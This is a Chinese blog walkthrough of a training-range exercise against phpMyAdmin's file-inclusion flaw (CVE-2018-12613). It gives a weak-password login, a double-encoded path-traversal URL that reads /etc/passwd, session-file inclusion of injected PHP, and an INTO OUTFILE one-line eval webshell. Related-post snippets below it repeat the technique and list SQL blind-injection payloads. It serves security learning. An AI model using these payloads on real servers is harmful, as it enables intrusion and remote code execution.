【墨者】靶场练习——phpMyAdmin后台文件包含分析溯源

最新推荐文章于 2024-05-03 19:26:50 发布
最新推荐文章于 2024-05-03 19:26:50 发布
阅读量540 收藏 10
点赞数 10
分类专栏: 墨者靶场随笔 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63082823/article/details/134939173
版权

​​​​​​网上挺多教程的,但是像我一样迷迷糊糊的肯定也有吧,在这里写下我的练习过程,我也没怎么懂,之后有新的理解了再补充上。

附上我看的两篇文章链接:

step 1

首先我们启动靶场,点击访问就会跳转到phpMyAdmin的登陆页面,我们使用弱口令root,root登录。
在这里插入图片描述
在这里插入图片描述

step 2

构造URL,在index.php后添加内容,如显示/etc/passwd详细内容。(这一步可省)

http://124.70.71.251:41694/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

step 3

执行SQL语句查询数据库路径。(可省)

show global variables like "%datadir%";
或
select @@datadir;

在这里插入图片描述

step 4

在SQL中执行select ‘<?php phpinfo() ?>’,然后查看当前页面cookie中的phpmyadmin的值。
在这里插入图片描述

step 5

构建包含Session值的URL路径,包含session文件。为啥这个URL这样写呢我也还没懂。

index.php?target=db_sql.php%253f/../../../../../../../../../../../tmp/sess_+之前记录的cookie

在这里插入图片描述

step 6

写马

select '<?php @eval($_REQUEST[cmd]);?>' into outfile '/var/www/html/1.php'

在这里插入图片描述

step 7

蚁剑连接http://ip/1.php,在根目录下找到key.txt,需要提交的key就在这个文件里
在这里插入图片描述
在这里插入图片描述

请君
关注
  • 10
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
墨者学院-phpMyAdmin后台文件包含分析溯源
qq_47094508的博客
07-01 1295
首先拿到题目到点击访问访问后使用弱口令进行登陆,如登陆失败开启隐私模式或者更换浏览器账户密码:root root点击sql模块 对sql语句进行一个查询首先查询sql写一句话的权限我们可以看到他的值为空secure-file-priv参数是用来限制LOAD DATA, SELECT ... OUTFILE, and LOAD_FILE()传到哪个指定目录的。 继续查看mysql安装的绝对路径,可以发现他是安装在/var/lib/mysql/ 接下来确认一下mysql权限,可以看到这里是最高权限r
墨者靶场 phpMyAdmin后台文件包含分析溯源 (CVE-2018-12613)
曹振国的博客
06-15 4908
phpMyAdmin第一种:一、利用burp爆破出账号密码二、尝试写马连入蚁剑1.发现MySQL对导入导出没做任何限制2.查询日志3.利用日志写文件4.访问写入的日志文件6.尝试直接通过into outfile写入一句话木马7.访问phpinfo文件,并连接蚁剑得到key值第二种:一、下载index.php文件进行分析1.发现55到63行存在问题二、下载Core.php进行分析1.找到checkPageValidity函数,在第443行2.查看白名单数组$whitelist3.包含根目录下的key.txt得
墨者学院CTF(phpMyAdmin后台文件包含分析溯源)
痴人说梦梦中人
09-11 3049
墨者学院CTF(phpMyAdmin后台文件包含分析溯源) 靶场地址: http://219.153.49.228:45122/ 相关知识: 1.phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613) 2.php代码审计 3.base64编码绕过 思路: 利用过滤规则绕过php文件包含的黑白名单限制,再利用php的session会话机制,包含一句话木马文件获取shell...
CVE-2018-12613 PhpMyadmin后台文件包含分析
热门推荐
3569
06-27 1万+
2018年6月19日,phpmyadmin在最新版本修复了一个严重级别的漏洞.描述:一个攻击者可以在服务器上包含(查看和潜在执行)文件的漏洞被发现。该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。攻击者必须经过身份验证,但在这些情况下除外:$ cfg ['AllowArbitraryServer'] = true:攻击者可以指定他/她已经控制...
Vulhub靶场-phpmyadmin scripts/setup.php 反序列化漏洞(WooYun-2016-199433)
Grace_for_it的博客
05-03 508
vulhub靶场复现 php源码 bp抓包 网络安全 渗透测试
07#墨者靶场-phpMyAdmin后台文件包含分析溯源
shy的博客
11-22 1396
墨者学习 By/shy014 地址:https://www.mozhe.cn/bug/detail/RDM4VFA0aHFWT25Na09mdmhqcklxdz09bW96aGUmozhe 1.在墨者学院找到...
墨者学院10 phpMyAdmin后台文件包含分析溯源
weixin_42789937的博客
02-12 480
墨者学院10 phpMyAdmin后台文件包含分析溯源,本文整理了评论区的三种解法,解题过程七分靠技术,三分靠运气~
墨者学院-入门级-phpMyAdmin后台文件包含分析溯源-小白必看(超详细)
kitiu666的博客
01-26 1303
2021年1月26日,第六次渗透测试。 实在抱歉,因为工作原因许久没有更新测试,期间生活也发生了很多事,现在心情也不怎么好,但也尽量讲细一点吧,开干! 准备需求: 1、win10系统; 2、中国菜刀; 1、进入靶场 账号:root 密码:root 这个账号密码都是看其他的教程知道的,至于怎样破解出来不知道,能力有限,过后我看看怎么来的吧。(如果了解再回来追跟); 2、进入到后台,到SQL页面,在控制台下输入以下命令,然后点击执行; select ‘<?php eval($_POST[key
墨者靶场 入门:phpMyAdmin后台文件包含分析溯源
qq_43233085的博客
01-13 794
墨者靶场 入门:phpMyAdmin后台文件包含分析溯源题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。 实训目标 1、了解此漏洞形成的原因; 2、掌握此漏洞的利用方式。 解题方向 根据漏洞编号找到相关知识。 解题步骤 启动靶场...
墨者未必黑——思想汇报 .docx
02-10
墨者未必黑——思想汇报 .docx
WebShell文件上传漏洞分析溯源
02-22
WebShell 文件上传漏洞分析溯源 一、WebShell 文件上传漏洞概述 WebShell 文件上传漏洞是指攻击者通过上传恶意文件(如WebShell)来获取服务器的控制权,从而实现对服务器的攻击和控制。这种漏洞通常存在于Web应用...
从信息到情报,从溯源到协同.pdf
03-21
安全分析与情报大会ppt 北京天际友盟信息技术有限公司 谢涛 演讲:从信息到情报,从溯源到协同, 内容包括如何运用威胁情报,具体的3个应用模式,很有启发意义,对威胁情报感兴趣的朋友可以看看
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
最新发布
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
初中语文 议论文阅读理解分类练习墨者未必黑 新人教版
08-19
初中语文 议论文阅读理解分类练习墨者未必黑 新人教版
spring IOC实现(墨者革离)
12-12
在这个名为"spring_IOC实现(墨者革离)"的项目中,我们可以通过模拟城门叩问的编剧场景来理解这一概念。 首先,控制反转的基本思想是将对象的创建和依赖关系的管理从应用程序中分离出来,交给一个外部容器(在...
phpMyAdmin后台文件包含分析溯源
qq_40554015的博客
11-12 3234
phpMyAdmin 漏洞利用汇总:PhpMyAdmin漏洞利用汇总 - 只言 - 博客园 漏洞编号:CVE-2018-12613 背景介绍 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。 一.弱口令登录 root-root 二.利用sql语句,将php代码写入Session文件中 三.包含Session文件 http://219.153.49.228:44273/
DVWA-master靶场,lampp环境部署
qq_39330735的博客
01-27 245
lampp部署DVWA-master环境
墨者靶场sql布尔盲注
10-09
针对墨者靶场的 SQL 布尔盲注,你需要先了解 SQL 注入的基本概念和实现方式。在进行布尔盲注时,需要通过构造特定的 SQL 语句来判断数据库中是否存在某些数据或条件,从而实现注入攻击。以下是一些可能用到的注入语句: 1. 判断存在性:SELECT * FROM table WHERE column = 'value' and 1=1(存在)或 1=2(不存在) 2. 判断字段长度:SELECT * FROM table WHERE LENGTH(column) = n and 1=1(长度为 n)或 1=2(长度不为 n) 3. 判断字符内容:SELECT * FROM table WHERE ASCII(SUBSTRING(column, n, 1)) = c and 1=1(第 n 个字符的 ASCII 码为 c)或 1=2(第 n 个字符的 ASCII 码不为 c) 在使用布尔盲注时,需要不断地尝试不同的语句,并根据返回结果进行判断和推断。同时,需要注意防止误伤和误判,以免造成不必要的影响和损失。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值